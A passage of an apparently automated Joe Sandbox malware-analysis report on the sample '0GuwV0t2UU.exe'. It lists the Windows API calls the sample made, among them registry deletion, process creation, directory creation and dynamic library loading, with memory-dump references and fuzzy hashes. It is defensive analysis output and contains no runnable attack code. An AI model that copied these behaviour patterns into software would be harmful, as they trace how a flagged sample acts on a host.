                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: Enum$CloseValue
                                                      • String ID:
                                                      • API String ID: 397863658-0
                                                      • Opcode ID: 6ec1cb72de713890a7fe95da29bb3e661ce5d0c083e3d0a32e7bda596729ac32
                                                      • Instruction ID: fde7ee3b690bf0a9f1400c3c006cad269c6ae989cb90eb9f0638982b81c2946e
                                                      • Opcode Fuzzy Hash: 6ec1cb72de713890a7fe95da29bb3e661ce5d0c083e3d0a32e7bda596729ac32
                                                      • Instruction Fuzzy Hash: B0017C71A04615ABEB149F94DE58BAFB668EF80348F10443EF101B61D0D7B85E41976D
                                                      APIs
                                                      • SetFilePointer.KERNELBASE(00008001,00000000,00000000,00000000,00000000,?,?,00403342,000000FF,00000000,00000000,00008001,?), ref: 004033BB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: FilePointer
                                                      • String ID:
                                                      • API String ID: 973152223-0
                                                      • Opcode ID: 3d500f412808721b8c87be071932eede801725a1d128c96ac4c777ed30e32dcd
                                                      • Instruction ID: 0f6a82c9814b8130565900c4f77509fb73920235a48305220d01948b4924e2c4
                                                      • Opcode Fuzzy Hash: 3d500f412808721b8c87be071932eede801725a1d128c96ac4c777ed30e32dcd
                                                      • Instruction Fuzzy Hash: 31317170640219BBDB22DF59ED48A9E3FA8EB00359F10443BF904FA1D1D3788E519BA9
                                                      APIs
                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402580
                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsaC158.tmp,00000000,00000011,00000002), ref: 00402622
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: CloseQueryValue
                                                      • String ID:
                                                      • API String ID: 3356406503-0
                                                      • Opcode ID: bbb01790bf66a898ec7bf5f4dca0a31f0af5c2fa46adf20976a7ac42051af756
                                                      • Instruction ID: a1e8d7c51e2174fe69d0a38a45018fa5c8ecdbf0c3d6cccc33ed9d3604573096
                                                      • Opcode Fuzzy Hash: bbb01790bf66a898ec7bf5f4dca0a31f0af5c2fa46adf20976a7ac42051af756
                                                      • Instruction Fuzzy Hash: 5A119E71A0421AEADF15DFA0DA589AEB7B4FF04348F20443FE402B62D0D3B88A45DB5D
                                                      APIs
                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                      • SendMessageW.USER32(0040A230,00000402,00000000), ref: 004013F4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: 44422ec4cc38e602ea7d4d2f5f5b5ed5cf3abc39ac7d2c30bec0a520d1a14902
                                                      • Instruction ID: 4cdfa14fa51073ec67c7732ce5b449902c092ffb61bdcee16cd85da0f6320b18
                                                      • Opcode Fuzzy Hash: 44422ec4cc38e602ea7d4d2f5f5b5ed5cf3abc39ac7d2c30bec0a520d1a14902
                                                      • Instruction Fuzzy Hash: 0F01F4327212209BE7295B389D05B6B3698E710354F10863FF855F6AF1DA78CC429B4C
                                                      APIs
                                                      • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040247B
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00402484
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: CloseDeleteValue
                                                      • String ID:
                                                      • API String ID: 2831762973-0
                                                      • Opcode ID: e118d0f5239d51441db66db07306c34d39c8aa15a5d7cfe4e748fc358846e0cc
                                                      • Instruction ID: e2e4e8893df5a4528a6e21454bcdecfabc6281ca852765cce5f9bf4b5ee6cd51
                                                      • Opcode Fuzzy Hash: e118d0f5239d51441db66db07306c34d39c8aa15a5d7cfe4e748fc358846e0cc
                                                      • Instruction Fuzzy Hash: 63F09632A04521ABDB10BBA9DB8EAEE72A5AB44354F11443FF542B71C1CAFC4D02977D
                                                      APIs
                                                      • CreateDirectoryW.KERNELBASE(0042C800,?), ref: 00405C38
                                                      • GetLastError.KERNEL32 ref: 00405C46
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: CreateDirectoryErrorLast
                                                      • String ID:
                                                      • API String ID: 1375471231-0
                                                      • Opcode ID: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
                                                      • Instruction ID: 25e10c4fac4d698a59efea960107f93253b8ac9e3b964bd1d6400c706bcc644c
                                                      • Opcode Fuzzy Hash: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
                                                      • Instruction Fuzzy Hash: E6F0F4B0C04209DAEB00CFA4D9497EFBBB4BB04319F00802AD541B6281D7B882488FA9
                                                      APIs
                                                      • ShowWindow.USER32(00000000,00000000), ref: 00401F21
                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401F2C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: Window$EnableShow
                                                      • String ID:
                                                      • API String ID: 1136574915-0
                                                      • Opcode ID: df5424ac206c7c619d61ed962fba1d912f5595003d61f115a6d45933f49013a7
                                                      • Instruction ID: fe372041eca2d55525124f815bce62a7554e94faae4ddb110be7aaab9f19639a
                                                      • Opcode Fuzzy Hash: df5424ac206c7c619d61ed962fba1d912f5595003d61f115a6d45933f49013a7
                                                      • Instruction Fuzzy Hash: 40E04876908610DFE754EBA4AE495EE73B4EF80365B10097FE001F11D1D7B94D00975D
                                                      APIs
                                                      • CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405CAE
                                                      • CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405CBB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateHandleProcess
                                                      • String ID:
                                                      • API String ID: 3712363035-0
                                                      • Opcode ID: dc4e0aa2a6e4d88c421582106c1d46ba955b2ae98b0244f92ff0ec2e2b298c3d
                                                      • Instruction ID: 3c730061575d40878ccbcf559f5dc137d48881e2855f55d79af12727e8fe0db1
                                                      • Opcode Fuzzy Hash: dc4e0aa2a6e4d88c421582106c1d46ba955b2ae98b0244f92ff0ec2e2b298c3d
                                                      • Instruction Fuzzy Hash: 0BE0BFB4600219BFFB109B64EE49F7B7B7CE700644F418425BD14F2591D77498149A7C
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(?,00000020,?,00403775,0000000C,?,?,?,?,?,?,?,?), ref: 00406AA8
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00406AC3
                                                        • Part of subcall function 00406A26: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A3D
                                                        • Part of subcall function 00406A26: wsprintfW.USER32 ref: 00406A78
                                                        • Part of subcall function 00406A26: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A8C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                      • String ID:
                                                      • API String ID: 2547128583-0
                                                      • Opcode ID: ecfc0d1632056c4e1693efd0f98aabdfe4a2c93a6abc515f3d9591ad468ff55d
                                                      • Instruction ID: 6883b19bcb958afdb132cd43d0a9aeb12fc85c99e1cf53eaa24744f9dd55f8c1
                                                      • Opcode Fuzzy Hash: ecfc0d1632056c4e1693efd0f98aabdfe4a2c93a6abc515f3d9591ad468ff55d
                                                      • Instruction Fuzzy Hash: CDE08636714611ABD210BA745E48C6777A89F86610306C83EF542F2141D734DC33AA79
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(00000003,00403138,C:\Users\user\Desktop\0GuwV0t2UU.exe,80000000,00000003), ref: 00406196
                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004061B8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: File$AttributesCreate
                                                      • String ID:
                                                      • API String ID: 415043291-0
                                                      • Opcode ID: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
                                                      • Instruction ID: be52236ca1bfc2e7009fe271a1dfd41440a2a0d1ebc26b2cb4c8630358080456
                                                      • Opcode Fuzzy Hash: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
                                                      • Instruction Fuzzy Hash: 30D09E31254301EFFF098F20DE16F2EBAA2EB94B00F11952CB682941E0DA715819DB15
                                                      APIs
                                                      • CreateDirectoryW.KERNELBASE(?,00000000,00403658,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040394F,?,00000008,0000000A,0000000C), ref: 00405C56
                                                      • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405C64
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: CreateDirectoryErrorLast
                                                      • String ID:
                                                      • API String ID: 1375471231-0
                                                      • Opcode ID: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
                                                      • Instruction ID: 868687b2a80a8d4cb6d5034857ca3092976d2c25b2f3b55ea206b3a8d14aaeda
                                                      • Opcode Fuzzy Hash: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
                                                      • Instruction Fuzzy Hash: C7C04C30608701DAEA105B31DE8CB177A50BB54741F198439A582F41B0DA348555D92D
                                                      APIs
                                                      • SetFilePointer.KERNELBASE(00000000), ref: 6E9F2C57
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2450949235.000000006E9F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E9F0000, based on PE: true
                                                      • Associated: 00000000.00000002.2450757132.000000006E9F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000000.00000002.2451038784.000000006E9F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000000.00000002.2451083781.000000006E9F6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6e9f0000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: FilePointer
                                                      • String ID:
                                                      • API String ID: 973152223-0
                                                      • Opcode ID: 5a099383fba6a075bf1e27880735534db89772a2b68d5581010e7cc26406d6a7
                                                      • Instruction ID: 652ec358171b2e8b8f5f456691fc8248c80c669daf7af4009b40be6f2fbf4fe2
                                                      • Opcode Fuzzy Hash: 5a099383fba6a075bf1e27880735534db89772a2b68d5581010e7cc26406d6a7
                                                      • Instruction Fuzzy Hash: 624170B1508A84EFDB10DFE4E845B9937BCEF96359F248826E809CB140D738D882CF91
                                                      APIs
                                                      • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028D4
                                                        • Part of subcall function 004065E9: wsprintfW.USER32 ref: 004065F6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: FilePointerwsprintf
                                                      • String ID:
                                                      • API String ID: 327478801-0
                                                      • Opcode ID: 71ec0585dfc1f5a4deb38e390d125e8dba0ecba5ee550c3c95508aededf6839d
                                                      • Instruction ID: 25ca00dcee0cf0708ebb41b42c3bcfe7940f6ca7f4ca5ddd9dc2277bf7af936e
                                                      • Opcode Fuzzy Hash: 71ec0585dfc1f5a4deb38e390d125e8dba0ecba5ee550c3c95508aededf6839d
                                                      • Instruction Fuzzy Hash: 04E06D71A08104AAEB04ABA5AE49CAF7379AF90345B20443FF101B00D8C6794D119A2D
                                                      APIs
                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040240E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2399890935.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2399866348.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399916876.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2399942907.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2400050757.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_0GuwV0t2UU.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfileStringWrite
                                                      • String ID:
